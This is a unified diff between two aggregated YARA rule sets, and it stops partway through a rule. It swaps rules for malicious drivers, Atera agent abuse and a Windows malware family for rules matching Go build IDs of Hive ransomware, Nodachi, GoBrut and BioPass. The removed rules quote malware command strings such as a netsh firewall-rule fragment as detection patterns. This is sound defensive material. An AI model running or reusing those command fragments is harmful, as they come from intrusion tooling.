-		$cmd3 = "Wsrun <process name>" ascii
-		$cmd4 = "ping 127.0.0.1 > nul\x0D\x0A"
-		$cmd5 = "/c netsh advfirewall firewall add rule name=" ascii
-		$msg1 = "Allocate pSd memory to failed!" ascii
-		$msg2 = "Allocate SID or ACL to failed!" ascii
-		$msg3 = "OpenSCManager error:%d" ascii
-		$msg4 = "%u:TCP:*:Enabled:%u" ascii
+		$s1 = "Go build ID: \"hOhuOA4W60aBBRoFQTDA/dl9DuLAgEcabYGK6ZT2t/ECsse3630jV_957OqqK3/ZRA_JRPFzxutK16zlEcM\"" ascii
+		$s2 = "Go build ID: \"NivDrAudWE-E6xtBXeww/3pv6fDzDqt4v0YxoTkPt/8vd79TNE-9Bt38ftxf_V/_GNqnqEUsRf-WTSmn8dM\"" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 200KB and ( ( $name and $key ) or ( 3 of ( $cmd* ) and 3 of ( $msg* ) ) )
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule HARFANGLAB_Custom_Ateraagent_Operator : FILE
+rule DITEKSHEN_INDICATOR_KB_Gobuildid_Banload : FILE
 {
 	meta:
-		description = "Detect Atera Agent configured to certain email addresses, or email domains"
-		author = "HarfangLab"
-		id = "af0fae1d-2d25-5551-8720-ff1172ff4eea"
-		date = "2024-04-17"
-		modified = "2024-04-22"
-		reference = "TRR240402"
-		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/TRR240402/trr240402_yara-template.yar#L1-L20"
-		license_url = "N/A"
-		logic_hash = "71622b61c5f645dd846327b79bf6dddefef458b73a82caa34d086da2ba48cd8c"
+		description = "Detects Golang Build IDs in known bad samples"
+		author = "ditekSHen"
+		id = "5955afd5-f26f-5df1-b355-b8f168b694b0"
+		date = "2024-01-23"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1635-L1643"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "534de1ce161e5e27f380f96b83630aa75031f268658aa7e8ff8ecce82ed5d4cd"
 		score = 75
-		quality = 80
+		quality = 75
 		tags = "FILE"
-		context = "file"
 
 	strings:
-		$email = "email@domain.tld"
-		$s1 = "PREVIOUSFOUNDWIX_UPGRADE_DETECTED"
-		$s2 = "INTEGRATORLOGIN"
-		$sc1 = { 0A 28 49 99 78 E5 89 8D F4 0A 23 8E B8 A5 52 E8 }
-		$sc2 = { 06 7F 60 47 95 66 24 A7 15 99 61 74 3D 81 94 93 }
+		$s1 = "Go build ID: \"a3629ee6ab610a57f242f59a3dd5e5f6de73da40\"" ascii
 
 	condition:
-		filesize > 1MB and filesize < 4MB and ( uint16be( 0 ) == 0xD0CF ) and @s1 < @email and @email < @s2 [ 3 ] and any of ( $sc* )
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-/*
- * YARA Rule Set
- * Repository Name: LOLDrivers
- * Repository: https://github.com/magicsword-io/LOLDrivers/
- * Retrieval Date: 2025-06-08
- * Git Commit: e2e48f15a0885e8b2ad2fb81255089845f5c183c
- * Number of Rules: 565
- * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
- *
- *
- * LICENSE
- *
- *                                  Apache License
-                           Version 2.0, January 2004
-                        http://www.apache.org/licenses/
-
-   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
-
-   1. Definitions.
-
-      "License" shall mean the terms and conditions for use, reproduction,
-      and distribution as defined by Sections 1 through 9 of this document.
-
-      "Licensor" shall mean the copyright owner or entity authorized by
-      the copyright owner that is granting the License.
-
-      "Legal Entity" shall mean the union of the acting entity and all
-      other entities that control, are controlled by, or are under common
-      control with that entity. For the purposes of this definition,
-      "control" means (i) the power, direct or indirect, to cause the
-      direction or management of such entity, whether by contract or
-      otherwise, or (ii) ownership of fifty percent (50%) or more of the
-      outstanding shares, or (iii) beneficial ownership of such entity.
-
-      "You" (or "Your") shall mean an individual or Legal Entity
-      exercising permissions granted by this License.
-
-      "Source" form shall mean the preferred form for making modifications,
-      including but not limited to software source code, documentation
-      source, and configuration files.
-
-      "Object" form shall mean any form resulting from mechanical
-      transformation or translation of a Source form, including but
-      not limited to compiled object code, generated documentation,
-      and conversions to other media types.
-
-      "Work" shall mean the work of authorship, whether in Source or
-      Object form, made available under the License, as indicated by a
-      copyright notice that is included in or attached to the work
-      (an example is provided in the Appendix below).
-
-      "Derivative Works" shall mean any work, whether in Source or Object
-      form, that is based on (or derived from) the Work and for which the
-      editorial revisions, annotations, elaborations, or other modifications
-      represent, as a whole, an original work of authorship. For the purposes
-      of this License, Derivative Works shall not include works that remain
-      separable from, or merely link (or bind by name) to the interfaces of,
-      the Work and Derivative Works thereof.
-
-      "Contribution" shall mean any work of authorship, including
-      the original version of the Work and any modifications or additions
-      to that Work or Derivative Works thereof, that is intentionally
-      submitted to Licensor for inclusion in the Work by the copyright owner
-      or by an individual or Legal Entity authorized to submit on behalf of
-      the copyright owner. For the purposes of this definition, "submitted"
-      means any form of electronic, verbal, or written communication sent
-      to the Licensor or its representatives, including but not limited to
-      communication on electronic mailing lists, source code control systems,
-      and issue tracking systems that are managed by, or on behalf of, the
-      Licensor for the purpose of discussing and improving the Work, but
-      excluding communication that is conspicuously marked or otherwise
-      designated in writing by the copyright owner as "Not a Contribution."
-
-      "Contributor" shall mean Licensor and any individual or Legal Entity
-      on behalf of whom a Contribution has been received by Licensor and
-      subsequently incorporated within the Work.
-
-   2. Grant of Copyright License. Subject to the terms and conditions of
-      this License, each Contributor hereby grants to You a perpetual,
-      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
-      copyright license to reproduce, prepare Derivative Works of,
-      publicly display, publicly perform, sublicense, and distribute the
-      Work and such Derivative Works in Source or Object form.
-
-   3. Grant of Patent License. Subject to the terms and conditions of
-      this License, each Contributor hereby grants to You a perpetual,
-      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
-      (except as stated in this section) patent license to make, have made,
-      use, offer to sell, sell, import, and otherwise transfer the Work,
-      where such license applies only to those patent claims licensable
-      by such Contributor that are necessarily infringed by their
-      Contribution(s) alone or by combination of their Contribution(s)
-      with the Work to which such Contribution(s) was submitted. If You
-      institute patent litigation against any entity (including a
-      cross-claim or counterclaim in a lawsuit) alleging that the Work
-      or a Contribution incorporated within the Work constitutes direct
-      or contributory patent infringement, then any patent licenses
-      granted to You under this License for that Work shall terminate
-      as of the date such litigation is filed.
-
-   4. Redistribution. You may reproduce and distribute copies of the
-      Work or Derivative Works thereof in any medium, with or without
-      modifications, and in Source or Object form, provided that You
-      meet the following conditions:
-
-      (a) You must give any other recipients of the Work or
-          Derivative Works a copy of this License; and
-
-      (b) You must cause any modified files to carry prominent notices
-          stating that You changed the files; and
-
-      (c) You must retain, in the Source form of any Derivative Works
-          that You distribute, all copyright, patent, trademark, and
-          attribution notices from the Source form of the Work,
-          excluding those notices that do not pertain to any part of
-          the Derivative Works; and
-
-      (d) If the Work includes a "NOTICE" text file as part of its
-          distribution, then any Derivative Works that You distribute must
-          include a readable copy of the attribution notices contained
-          within such NOTICE file, excluding those notices that do not
-          pertain to any part of the Derivative Works, in at least one
-          of the following places: within a NOTICE text file distributed
-          as part of the Derivative Works; within the Source form or
-          documentation, if provided along with the Derivative Works; or,
-          within a display generated by the Derivative Works, if and
-          wherever such third-party notices normally appear. The contents
-          of the NOTICE file are for informational purposes only and
-          do not modify the License. You may add Your own attribution
-          notices within Derivative Works that You distribute, alongside
-          or as an addendum to the NOTICE text from the Work, provided
-          that such additional attribution notices cannot be construed
-          as modifying the License.
-
-      You may add Your own copyright statement to Your modifications and
-      may provide additional or different license terms and conditions
-      for use, reproduction, or distribution of Your modifications, or
-      for any such Derivative Works as a whole, provided Your use,
-      reproduction, and distribution of the Work otherwise complies with
-      the conditions stated in this License.
-
-   5. Submission of Contributions. Unless You explicitly state otherwise,
-      any Contribution intentionally submitted for inclusion in the Work
-      by You to the Licensor shall be under the terms and conditions of
-      this License, without any additional terms or conditions.
-      Notwithstanding the above, nothing herein shall supersede or modify
-      the terms of any separate license agreement you may have executed
-      with Licensor regarding such Contributions.
-
-   6. Trademarks. This License does not grant permission to use the trade
-      names, trademarks, service marks, or product names of the Licensor,
-      except as required for reasonable and customary use in describing the
-      origin of the Work and reproducing the content of the NOTICE file.
-
-   7. Disclaimer of Warranty. Unless required by applicable law or
-      agreed to in writing, Licensor provides the Work (and each
-      Contributor provides its Contributions) on an "AS IS" BASIS,
-      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
-      implied, including, without limitation, any warranties or conditions
-      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
-      PARTICULAR PURPOSE. You are solely responsible for determining the
-      appropriateness of using or redistributing the Work and assume any
-      risks associated with Your exercise of permissions under this License.
-
-   8. Limitation of Liability. In no event and under no legal theory,
-      whether in tort (including negligence), contract, or otherwise,
-      unless required by applicable law (such as deliberate and grossly
-      negligent acts) or agreed to in writing, shall any Contributor be
-      liable to You for damages, including any direct, indirect, special,
-      incidental, or consequential damages of any character arising as a
-      result of this License or out of the use or inability to use the
-      Work (including but not limited to damages for loss of goodwill,
-      work stoppage, computer failure or malfunction, or any and all
-      other commercial damages or losses), even if such Contributor
-      has been advised of the possibility of such damages.
-
-   9. Accepting Warranty or Additional Liability. While redistributing
-      the Work or Derivative Works thereof, You may choose to offer,
-      and charge a fee for, acceptance of support, warranty, indemnity,
-      or other liability obligations and/or rights consistent with this
-      License. However, in accepting such obligations, You may act only
-      on Your own behalf and on Your sole responsibility, not on behalf
-      of any other Contributor, and only if You agree to indemnify,
-      defend, and hold each Contributor harmless for any liability
-      incurred by, or claims asserted against, such Contributor by reason
-      of your accepting any such warranty or additional liability.
-
-   END OF TERMS AND CONDITIONS
-
-   APPENDIX: How to apply the Apache License to your work.
-
-      To apply the Apache License to your work, attach the following
-      boilerplate notice, with the fields enclosed by brackets "[]"
-      replaced with your own identifying information. (Don't include
-      the brackets!)  The text should be enclosed in the appropriate
-      comment syntax for the file format. We also recommend that a
-      file or class name and description of purpose be included on the
-      same "printed page" as the copyright notice for easier
-      identification within third-party archives.
-
-   Copyright [yyyy] [name of copyright owner]
-
-   Licensed under the Apache License, Version 2.0 (the "License");
-   you may not use this file except in compliance with the License.
-   You may obtain a copy of the License at
-
-       http://www.apache.org/licenses/LICENSE-2.0
-
-   Unless required by applicable law or agreed to in writing, software
-   distributed under the License is distributed on an "AS IS" BASIS,
-   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-   See the License for the specific language governing permissions and
-   limitations under the License.
-
- */
-rule LOLDRIVERS_MAL_Driver_Crowdstrikeinc_Csagentsys_Crowdstrikefalconsensor_94B8
+rule DITEKSHEN_INDICATOR_KB_Gobuildid_Hive : FILE
 {
 	meta:
-		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - idmtdi.sys"
-		author = "Florian Roth"
-		id = "b3173c53-ef34-5722-8f49-dd596733c7fe"
-		date = "2025-03-07"
-		modified = "2025-03-07"
-		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L2-L21"
-		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "94b87b1cdaf1d86c2bc4eacef45608d0f16fdd3b981b88cdddc16b6bc64fe25d"
-		logic_hash = "9376ab5835e07d117ee3d157713339c0ffeda2479cb8183dc82cfffcbb29971d"
-		score = 70
-		quality = 80
-		tags = ""
+		description = "Detects Golang Build IDs in Hive ransomware"
+		author = "ditekSHen"
+		id = "7d7f7757-de7b-52a7-aab0-8fda38a86fd1"
+		date = "2024-01-23"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1645-L1653"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "f311a3661ea3a26ebca6cd283d1e219011acfdfbb13fa8b919ca2724b9f4aae7"
+		score = 75
+		quality = 75
+		tags = "FILE"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]00430072006f007700640053007400720069006b0065002000460061006c0063006f006e002000530065006e0073006f00720020004400720069007600650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00430072006f007700640053007400720069006b0065002c00200049006e0063002e }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0036002e00330034002e00310034003800300036002e0030 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0036002e00330034002e00310034003800300036002e0030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00430053004100670065006e0074002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00430072006f007700640053007400720069006b0065002000460061006c0063006f006e002000530065006e0073006f0072 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00430053004100670065006e0074002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]002800630029002000430072006f007700640053007400720069006b0065002c00200049006e0063002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
+		$s1 = "Go build ID: \"XDub7DGmWVQ2COC6W4If/XHMqRPf2lnJUiVkG1CR6/u_MaUU0go2UUmLb_INuv/WrZSyz-WMW1st_NaM935\"" ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule LOLDRIVERS_MAL_Driver_Microsoftcorporation_Windbgsys_Microsoftwindowsoperatingsystem_6994
+rule DITEKSHEN_INDICATOR_KB_Gobuildid_Nodachi : FILE
 {
 	meta:
-		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - windbg.sys"
-		author = "Florian Roth"
-		id = "05060e37-3c01-5b86-a3ee-6e141399164a"
-		date = "2025-03-07"
-		modified = "2025-03-07"
-		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L24-L59"
-		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "6994b32e3f3357f4a1d0abe81e8b62dd54e36b17816f2f1a80018584200a1b77"
-		hash = "5b932eab6c67f62f097a3249477ac46d80ddccdc52654f8674060b4ddf638e5d"
-		hash = "ea50f22daade04d3ca06dedb497b905215cba31aae7b4cab4b533fda0c5be620"
-		hash = "f936ec4c8164cbd31add659b61c16cb3a717eac90e74d89c47afb96b60120280"
-		hash = "32882949ea084434a376451ff8364243a50485a3b4af2f2240bb5f20c164543d"
-		hash = "6661320f779337b95bbbe1943ee64afb2101c92f92f3d1571c1bf4201c38c724"
-		hash = "86047bb1969d1db455493955fd450d18c62a3f36294d0a6c3732c88dfbcc4f62"
-		hash = "06c5ebd0371342d18bc81a96f5e5ce28de64101e3c2fd0161d0b54d8368d2f1f"
-		hash = "4734a0a5d88f44a4939b8d812364cab6ca5f611b9b8ceebe27df6c1ed3a6d8a4"
-		hash = "770f33259d6fb10f4a32d8a57d0d12953e8455c72bb7b60cb39ce505c507013a"
-		hash = "50819a1add4c81c0d53203592d6803f022443440935ff8260ff3b6d5253c0c76"
-		hash = "f9f2091fccb289bcf6a945f6b38676ec71dedb32f3674262928ccaf840ca131a"
-		hash = "fa9abb3e7e06f857be191a1e049dd37642ec41fb2520c105df2227fcac3de5d5"
-		hash = "139f8412a7c6fdc43dcfbbcdba256ee55654eb36a40f338249d5162a1f69b988"
-		hash = "e1cb86386757b947b39086cc8639da988f6e8018ca9995dd669bdc03c8d39d7d"
-		hash = "e6f764c3b5580cd1675cbf184938ad5a201a8c096607857869bd7c3399df0d12"
-		hash = "bb2422e96ea993007f25c71d55b2eddfa1e940c89e895abb50dd07d7c17ca1df"
-		logic_hash = "161f83c85ad516f3f06f3719a1d8ae0c841e818e50f985403133c2f77b7be894"
-		score = 70
-		quality = 80
-		tags = ""
+		description = "Detects Golang Build IDs in Nodachi"
+		author = "ditekSHen"
+		id = "9d578768-7995-5fb0-8bf1-9c2221cdef80"
+		date = "2024-01-23"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1655-L1666"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "177269623e0f3850c37c6b203d9a637fa92c0ed3fa823cc8d885f28cb383bf7d"
+		score = 75
+		quality = 75
+		tags = "FILE"
+
+	strings:
+		$s1 = "Go build ID: \"3AAyhKK0wFfCYLdz5oRV/zKyiBHCsAEyDIWhaW5AW/Rb8NLT3q8A2OLm6izDGP/8G9k_gjOTX_PXKna_IMj\"" ascii
+		$s2 = "Go build ID: \"-eyFd8kbpwxUsutpqZn_/vqzQXX5Ra4qk1XHoqocW/wd-6gLzQKZyEyhVp7qOj/Jr14hyc7pLLgeIZNbfLD\"" ascii
+		$s3 = "Go build ID: \"xDSqp4KGmd0SAf5irMGh/-kA7PGjKoJcvCgsZDStn/lHeQ1LQOVyQB2NnwIwFP/-D5oEBc23ND7IGLTESdM\"" ascii
+		$s4 = "Go build ID: \"67RcwNspLH__QJrElMcB/zMJf7Go1s0ZoXqd30Lb_/NaJl4rfcuLEG5LeZ-Y4k/MzFNvW79enRRdx3LmA47\"" ascii
+
+	condition:
+		uint16( 0 ) == 0x5a4d and 1 of them
+}
+rule DITEKSHEN_INDICATOR_KB_Gobuildid_Gobrut : FILE
+{
+	meta:
+		description = "Detects Golang Build IDs in GoBrut"
+		author = "ditekSHen"
+		id = "65953012-fc84-50d0-b769-64df66d8a54b"
+		date = "2024-01-23"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1668-L1676"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "40c305f019cb31222fa75a24315764cb5e5356afaa72aefb59916d615a8fca28"
+		score = 75
+		quality = 75
+		tags = "FILE"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]00570069006e0064006f007700730020004700550049002000730079006d0062006f006c00690063002000640065006200750067006700650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]004d006900630072006f0073006f0066007400200043006f00720070006f0072006100740069006f006e }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]00310030002e0030002e00310039003000340031002e0036003800350020002800570069006e004200750069006c0064002e003100360030003100300031002e00300038003000300029 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]00310030002e0030002e00310039003000340031002e003600380035 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00770069006e006400620067002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]004d006900630072006f0073006f00660074003f002000570069006e0064006f00770073003f0020004f007000650072006100740069006e0067002000530079007300740065006d }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00770069006e006400620067002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]003f0020004d006900630072006f0073006f0066007400200043006f00720070006f0072006100740069006f006e002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
+		$s1 = "Go build ID: \"sf_2_ylcjquGBe4mQ99L/aPvdLbM2z9HfoDN3RazG/8bhYeVA67N-ifbDYCDJe/UZzCu_EFL9f10gSfO4L0\"" ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule LOLDRIVERS_MAL_Driver_Gentilkiwibenjamindelpy_Mimidrv_Mimidrvmimikatz_AAF0
+rule DITEKSHEN_INDICATOR_KB_Gobuildid_Biopassdropper : FILE
 {
 	meta:
-		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - mimidrv.sys"
-		author = "Florian Roth"
-		id = "57e5655e-1313-585f-931c-d892e8952d0e"
-		date = "2025-03-07"
-		modified = "2025-03-07"
-		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L62-L120"
-		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "aaf04d89fd15bc61265e545f8e1da80e20f59f90058ed343c62ee24358e3af9e"
-		hash = "4b97d63ebdeda6941bb8cef5e94741c6cca75237ca830561f2262034805f0919"
-		hash = "c42c1e5c3c04163bf61c3b86b04a5ec7d302af7e254990cef359ac80474299da"
-		hash = "f03f0fb3a26bb83e8f8fa426744cf06f2e6e29f5220663b1d64265952b8de1a1"
-		hash = "0f98492c92e35042b09032e3d9aedc357e4df94fc840217fa1091046f9248a06"
-		hash = "d032001eab6cad4fbef19aab418650ded00152143bd14507e17d62748297c23f"
-		hash = "2456a7921fa8ab7b9779e5665e6b42fccc019feb9e49a9a28a33ec0a4bb323c4"
-		hash = "f9b01406864ab081aa77eef4ad15cb2dd2f830d1ef54f52622a59ff1aeb05ba5"
-		hash = "19dfacea1b9f19c0379f89b2424ceb028f2ce59b0db991ba83ae460027584987"
-		hash = "3ca5d47d076e99c312578ef6499e1fa7b9db88551cfc0f138da11105aca7c5e1"
-		hash = "cf9451c9ccc5509b9912965f79c2b95eb89d805b2a186d7521d3a262cf5a7a37"
-		hash = "a0931e16cf7b18d15579e36e0a69edad1717b07527b5407f2c105a2f554224b2"
-		hash = "492113a223d6a3fc110059fe46a180d82bb8e002ef2cd76cbf0c1d1eb8243263"
-		hash = "85b9d7344bf847349b5d58ebe4d44fd63679a36164505271593ef1076aa163b2"
-		hash = "efa56907b9d0ec4430a5d581f490b6b9052b1e979da4dab6a110ab92e17d4576"
-		hash = "12b0000698b79ea3c8178b9e87801cc34bad096a151a8779559519deafd4e3f0"
-		hash = "4136f1eb11cc463a858393ea733d5f1c220a3187537626f7f5d63eccf7c5a03f"
-		hash = "ee525b90053bb30908b5d7bf4c5e9b8b9d6b7b5c9091a26fa25d30d3ad8ef5d0"
-		hash = "10ad50fcb360dcab8539ea322aaf2270565dc835b7535790937348523d723d6b"
-		hash = "4d42678df3917c37f44a1506307f1677b9a689efcf350b1acce7e6f64b514905"
-		hash = "d37996abc8efb29f1ccbb4335ce9ba9158bec86cc4775f0177112e87e4e3be5c"
-		hash = "569fe70bedd0df8585689b0e88ad8bd0544fdf88b9dbfc2076f4bdbcf89c28aa"
-		hash = "80e4c83cfa9d675a6746ab846fa5da76d79e87a9297e94e595a2d781e02673b3"
-		hash = "1a5c08d40a5e73b9fe63ea5761eaec8f41d916ca3da2acbc4e6e799b06af5524"
-		hash = "ee7b8eb150df2788bb9d5fe468327899d9f60d6731c379fd75143730a83b1c55"
-		hash = "a1e6b431534258954db07039117b3159e889c6b9e757329bbd4126383c60c778"
-		hash = "e99580e25f419b5ad90669e0c274cf63d30efa08065d064a863e655bdf77fb59"
-		hash = "b0b80a11802b4a8ca69c818a03e76e7ef57c2e293de456439401e8e6073f8719"
-		hash = "4c89c907b7525b39409af1ad11cc7d2400263601edafc41c935715ef5bd145de"
-		hash = "083f821d90e607ed93221e71d4742673e74f573d0755a96ad17d1403f65a2254"
-		hash = "e8ec06b1fa780f577ff0e8c713e0fd9688a48e0329c8188320f9eb62dfc0667f"
-		hash = "ac5fb90e88d8870cd5569e661bea98cf6b001d83ab7c65a5196ea3743146939a"
-		hash = "7b846b0a717665e4d9fb313f25d1f6a5b782e495387aea45cf87ad3c049ac0db"
-		hash = "93aa3066ae831cdf81505e1bc5035227dc0e8f06ebbbb777832a17920c6a02fe"
-		hash = "082a79311da64b6adc3655e79aa090a9262acaac3b917a363b9571f520a17f6a"
-		hash = "bc49cb96f3136c3e552bf29f808883abb9e651040415484c1736261b52756908"
-		hash = "95e5b5500e63c31c6561161a82f7f9373f99b5b1f54b018c4866df4f2a879167"
-		hash = "d43520128871c83b904f3136542ea46644ac81a62d51ae9d3c3a3f32405aad96"
-		hash = "94c71954ac0b1fd9fa2bd5c506a16302100ba75d9f84f39ee9b333546c714601"
-		hash = "793b78e70b3ae3bb400c5a8bc4d2d89183f1d7fc70954aed43df7287248b6875"
-		logic_hash = "9566444b1d3adb2a8a5f48b45bbbdb5c9be3ce399ec091e3ffd13780a90227f1"
-		score = 70
-		quality = 80
-		tags = ""
+		description = "Detects Golang Build IDs in BioPass dropper"
+		author = "ditekSHen"
+		id = "b82d34d9-7774-5f99-9d76-b5426e015981"
+		date = "2024-01-23"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1678-L1686"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "3b586e886b9f901dde1c73aa07ce0d45e4ff417459f298094359ec1c1e02e522"
+		score = 75
+		quality = 75
+		tags = "FILE"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]006d0069006d006900640072007600200066006f0072002000570069006e0064006f0077007300200028006d0069006d0069006b00610074007a0029 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00670065006e00740069006c006b0069007700690020002800420065006e006a0061006d0069006e002000440045004c005000590029 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0032002e0032002e0030002e0030 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002e0032002e0030002e0030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006d0069006d0069006400720076 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]006d0069006d006900640072007600200028006d0069006d0069006b00610074007a0029 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006d0069006d0069006400720076002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f00700079007200690067006800740020002800630029002000320030003000370020002d00200032003000320030002000670065006e00740069006c006b0069007700690020002800420065006e006a0061006d0069006e002000440045004c005000590029 }
+		$s1 = "Go build ID: \"OS0VlkdEIlcl3WDDr9Za/_oVwEipaaX6V4mEEYg2V/PytlyeIYgV65maz4wT2Y/IQvgbHv3bbLV42i10qq2\"" ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule LOLDRIVERS_MAL_Driver_Gentilkiwibenjamindelpy_Mimidrv_Mimidrvmimikatz_DDF4
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Rhysida
 {
 	meta:
-		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - mimidrv.sys"
-		author = "Florian Roth"
-		id = "0b38be06-60df-5b49-a748-eb175e1db33f"
-		date = "2025-03-07"
-		modified = "2025-03-07"
-		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L123-L156"
-		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "ddf427ce55b36db522f638ba38e34cd7b96a04cb3c47849b91e7554bfd09a69a"
-		hash = "bcb774b6f6ff504d2db58096601bc5cb419c169bfbeaa3af852417e87d9b2aa0"
-		hash = "af4f42197f5ce2d11993434725c81ecb6f54025110dedf56be8ffc0e775d9895"
-		hash = "9dc7beb60a0a6e7238fc8589b6c2665331be1e807b4d2b3ddd1c258dbbd3e2f7"
-		hash = "2da2b883e48e929f5365480d487590957d9e6582cc6da2c0b42699ba85e54fe2"
-		hash = "29348ebe12d872c5f40e316a0043f7e5babe583374487345a79bad0ba93fbdfe"
-		hash = "e4b2c0aa28aac5e197312a061b05363e2e0387338b28b23272b5b6659d29b1d8"
-		hash = "897f2bbe81fc3b1ae488114b93f3eb0133a85678d061c7a6f718507971f33736"
-		hash = "0f7bfa10075bf5c193345866333d415509433dbfe5a7d45664b88d72216ff7c3"
-		hash = "469713c76c7a887826611b8c7180209a8bb6250f91d0f1eb84ac4d450ef15870"
-		hash = "818787057fc60ac8b957aa37d750aa4bace8e6a07d3d28b070022ee6dcd603ab"
-		hash = "4af8192870afe18c77381dfaf8478f8914fa32906812bb53073da284a49ae4c7"
-		hash = "0740359baef32cbb0b14a9d1bd3499ea2e770ff9b1c85898cfac8fd9aca4fa39"
-		hash = "62764ddc2dce74f2620cd2efd97a2950f50c8ac5a1f2c1af00dc5912d52f6920"
-		hash = "3b2cd65a4fbdd784a6466e5196bc614c17d1dbaed3fd991d242e3be3e9249da6"
